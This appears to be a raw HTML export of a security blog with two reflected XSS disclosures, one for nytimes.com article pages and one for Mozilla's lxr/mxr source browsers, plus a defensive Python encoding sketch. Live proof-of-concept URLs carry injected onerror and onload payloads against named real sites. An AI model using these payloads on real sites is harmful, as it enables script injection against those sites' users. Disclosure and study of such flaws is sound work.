<a href="http://2.bp.blogspot.com/-X2QNSQVhDSw/VHaZKvE-lCI/AAAAAAAAAZc/HUw9afmp3Wg/s1600/nytimes_2010_xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-X2QNSQVhDSw/VHaZKvE-lCI/AAAAAAAAAZc/HUw9afmp3Wg/s1600/nytimes_2010_xss.png" width="400" /></span></a></div>
<div class="separator" style="clear: both;">
<a href="http://4.bp.blogspot.com/-MONV6rKFlzE/VHaZKWEGD5I/AAAAAAAAAZY/PbV602hbw4c/s1600/nytimes_2011_xss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://4.bp.blogspot.com/-MONV6rKFlzE/VHaZKWEGD5I/AAAAAAAAAZY/PbV602hbw4c/s1600/nytimes_2011_xss.png" width="400" /></span></a></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Live PoC URLs:</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;?pagewanted=all&amp;_r=0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2009/08/06/technology/06stats.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2008/07/09/dining/091crex.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Video:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=RekCK5tjXWQ">https://www.youtube.com/watch?v=RekCK5tjXWQ</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b><br />
<a href="http://tetraph.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Analysis:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Take the following link as an example,</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/" href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/" target="_blank">http://www.nytimes.com/2012/<wbr></wbr>02/12/sunday-review/big-datas-<wbr></wbr>impact-in-the-world.html/</a>“><<wbr></wbr>vulnerabletoattack</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The reflected page contains the following code. All of them are vulnerable.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><li class=”print”></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>print”>Print</testtesttest?<wbr></wbr>pagewanted=print”></a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><li class=”singlePage”></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>testtesttest?pagewanted=all”> Single Page</vulnerabletoattack?<wbr></wbr>pagewanted=all”></a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> </li></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><li> <a onclick=”s_code_linktrack(‘<wbr></wbr>Article-MultiPagePageNum2′);” title=”Page 2″ href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>2″>2</testtesttest?pagewanted=<wbr></wbr>2″></a> </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><li> <a onclick=”s_code_linktrack(‘<wbr></wbr>Article-MultiPagePageNum3′);” title=”Page 3″ href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>3″>3</testtesttest?pagewanted=<wbr></wbr>3″></a> </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a class=”next” onclick=”s_code_linktrack(‘<wbr></wbr>Article-MultiPage-Next’);” title=”Next Page” href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>2″>Next Page »</testtesttest?pagewanted=2″><wbr></wbr></a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">(3) What is XSS?</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;">"Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques. Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)</span></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability can be exploited without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.</span></div>
<div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discovered and Reported by:</span></div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558912434010730497">@justqdjing</a>)</span></div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="-webkit-transition: color 0.3s; outline: none; transition: color 0.3s;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing</span></a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
<div>
<a href="http://lists.openwall.net/full-disclosure/2014/10/16/2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2014/10/16/2</span></a><br />
<a href="http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/xss-vulnerability/new-york-times-xss</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1102</span></a><br />
<a href="http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/121907302752/new-york-times-xss</span></a><br />
<a href="http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/xss-vulnerability/new-york-times-xss</span></a><br />
<a href="https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://progressive-comp.com/?l=full-disclosure&m=141343993908563&w=1</span></a><br />
<a href="http://webtech.lofter.com/post/1cd3e0d3_6f57c56"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webtech.lofter.com/post/1cd3e0d3_6f57c56</span></a><br />
<a href="http://tetraph.blog.163.com/blog/static/2346030512014101270479/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/2346030512014101270479/</span></a><br />
<a href="https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-before-2013-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://vulnerabilitypost.wordpress.com/2014/11/01/new-york-times-xss</span></a><br />
<a href="http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles-du-new-york-times"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lifegrey.tumblr.com/post/121912534859/tous-les-liens-vers-les-articles</span></a><br />
<a href="http://securityrelated.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2014/10/new-york-times-design.html</span></a><br />
<a href="https://mathfas.wordpress.com/2014/11/01/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-before-2013-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2014/11/01/new-york-times-xss</span></a><br />
<a href="http://computerobsess.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2014/10/new-york-times-design.html</span></a><br />
<a href="http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-in-new-york-times-nyt-published"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatview.tumblr.com/post/103788276286/urls-to-articles-xss</span></a><br />
<a href="http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/xss-vulnerability/new-york-times-xss</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-72049777069978953452015-06-20T02:15:00.000-07:002015-06-20T02:15:44.816-07:00Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)</b></span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><span style="font-size: small;"><b>Domains:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://mxr.mozilla.org/</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">(The two domains above are almost the same)</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>Websites information:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">"lxr.mozilla.org, mxr.mozilla.org are cross references designed to display the Mozilla source code. The sources displayed are those that are currently checked in to the mainline of the mozilla.org CVS server, Mercurial Server, and Subversion Server; these pages are updated many times a day, so they should be pretty close to the latest‑and‑greatest." (from Mozilla)</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br />"Mozilla is a free-software community which produces the Firefox web browser. The Mozilla community uses, develops, spreads and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation. In addition to the Firefox browser, Mozilla also produces Thunderbird, Firefox Mobile, the Firefox OS mobile operating system, the bug tracking system Bugzilla and a number of other projects." (Wikipedia)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>(1) Vulnerability description:</b></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;">The Mozilla website has a security problem: attackers can exploit XSS bugs in it. Here is a description of XSS: "Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques. Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)</span></span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;"><br /></span></span><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;"><br /></span></span><span style="font-size: small;"><span style="background-color: white; line-height: 19.6px; text-align: justify;"><br /></span></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">All pages under the following two URLs are vulnerable.</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/mozilla-central/source</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://mxr.mozilla.org/mozilla-central/source</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla's users.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">There are a large number of pages under them, and the contents of the two domains vary, which makes the vulnerability very dangerous. Attackers can use different URLs to design XSS attacks against Mozilla's various classes of users.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span><br />
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://4.bp.blogspot.com/-MK2yG3MJWK0/VHVurLywxOI/AAAAAAAAAYU/lvEFHLeHFA0/s1600/mozilla_lxr_2_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" height="253" src="http://4.bp.blogspot.com/-MK2yG3MJWK0/VHVurLywxOI/AAAAAAAAAYU/lvEFHLeHFA0/s1600/mozilla_lxr_2_xss.png" width="400" /></span></a></span></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://3.bp.blogspot.com/-_1rodokb16Q/VHVurCoEtYI/AAAAAAAAAYg/A-BHu6MpgfQ/s1600/mozilla_mxr_1_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" height="253" src="http://3.bp.blogspot.com/-_1rodokb16Q/VHVurCoEtYI/AAAAAAAAAYg/A-BHu6MpgfQ/s1600/mozilla_mxr_1_xss.png" width="400" /></span></a></span></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b><br /></b></span></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/" href="http://lxr.mozilla.org/mozilla-central/source/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/</a><body onload=prompt("justqdjing")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/mobile/android/" href="http://lxr.mozilla.org/mozilla-central/source/mobile/android/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/mobile/android/</a><body onload=prompt("justqdjing")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/Android.mk/" href="http://lxr.mozilla.org/mozilla-central/source/Android.mk/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/Android.mk/</a><body onload=prompt("tetraph")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/" href="http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/" target="_blank">http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/</a><body onload=prompt("tetraph")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp" href="http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp" target="_blank">http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp</a><body onload=prompt("tetraph")></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/" href="http://mxr.mozilla.org/mozilla-central/source/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/</a><body onload=prompt("justqdjing")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/webapprt/" href="http://mxr.mozilla.org/mozilla-central/source/webapprt/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/webapprt/</a><body onload=prompt("justqdjing")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/" href="http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/</a><body onload=prompt("justqdjing")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/" href="http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/</a><body onload=prompt("tetraph")></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a data-mce-href="http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/" href="http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/" target="_blank">http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/</a><body onload=prompt("tetraph")></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=onA5BgC3zIY"><span style="color: black;">https://www.youtube.com/watch?v=onA5BgC3zIY</span></a></span></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><br /></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>(2) Vulnerability Analysis:</b></span></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">Take the following link as an example,</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">The reflected page contains the following code.</span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="/mozilla-central/source/chrome/%253Cattacktest%253E"></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"><attacktest></attacktest></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;"></a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">If "<body onload=prompt("justqdjing")>" is inserted into the URL, the code can be executed.</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /></span><br />
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability can be exploited without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
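<div>
<span style="font-family: Arial,Helvetica,sans-serif;">Both analyses on this page (the nytimes.com pagination links and the lxr/mxr source links) show a request path written into the response without encoding for the context it lands in. The Python sketch below is an added example, not code from either site or from the original post: it puts the two reflected patterns beside a context-encoded version and uses an HTML parser to check whether the path created any extra element. All function names are hypothetical, the templates are simplified from the snippets quoted above, and the sample paths are constructed from the page's own harmless markers.</span></div>

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed sample paths, built from the harmless markers quoted on this page.
NYT_PATH = '/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack'
MOZ_PATH = "/mozilla-central/source/chrome/<attacktest>"


def pagination_link_unsafe(path, page="print", label="Print"):
    """First analysis: the raw path is copied into a double-quoted href,
    so a '"' in the path closes the attribute and '>' closes the tag."""
    return '<li class="print"><a href="%s?pagewanted=%s">%s</a></li>' % (path, page, label)


def source_link_unsafe(path):
    """Second analysis: the href is percent-encoded, but the last path
    component is written unescaped as the link text."""
    return '<a href="%s">%s</a>' % (quote(path, safe="/"), path.rsplit("/", 1)[-1])


def link_safe(path, label, query=""):
    """Encode once per context: URL encoding for the path, then HTML
    escaping for the attribute value and for the element text."""
    href = quote(path, safe="/")
    if query:
        href += "?" + query
    return '<a href="%s">%s</a>' % (html.escape(href, quote=True),
                                    html.escape(label, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag and text node the parser sees."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_data(self, data):
        self.text.append(data)


def parse(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


def injected_tags(markup, allowed=("li", "a")):
    """Names of elements the template did not intend to emit."""
    return [tag for tag, _ in parse(markup).tags if tag not in allowed]


def visible_text(markup):
    """Text a reader would see, with character references decoded."""
    return "".join(parse(markup).text)


if __name__ == "__main__":
    cases = [
        ("pagination link, raw path", pagination_link_unsafe(NYT_PATH)),
        ("source link, raw link text", source_link_unsafe(MOZ_PATH)),
        ("pagination link, encoded", link_safe(NYT_PATH, "Print", "pagewanted=print")),
        ("source link, encoded", link_safe(MOZ_PATH, MOZ_PATH.rsplit("/", 1)[-1])),
    ]
    for name, markup in cases:
        print("%-28s injected=%r" % (name, injected_tags(markup)))
```

<div>
<span style="font-family: Arial,Helvetica,sans-serif;">The same parser check can run as a regression test against any template that echoes part of the request URL.</span></div>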
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b><br /></b></span><span style="font-size: small;"><b>(3) Vulnerability Disclosure:</b></span></span><br />
<div>
<div>
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability has been reported to bugzilla.mozilla.org. Mozilla is dealing with this issue.</span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br class="Apple-interchange-newline" />Discovered and Reported by:</span></div>
<div style="background-color: white;">
<span style="font-family: Arial,Helvetica,sans-serif;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558912321821499392">@justqdjing</a>)</span></div>
<div style="background-color: white;">
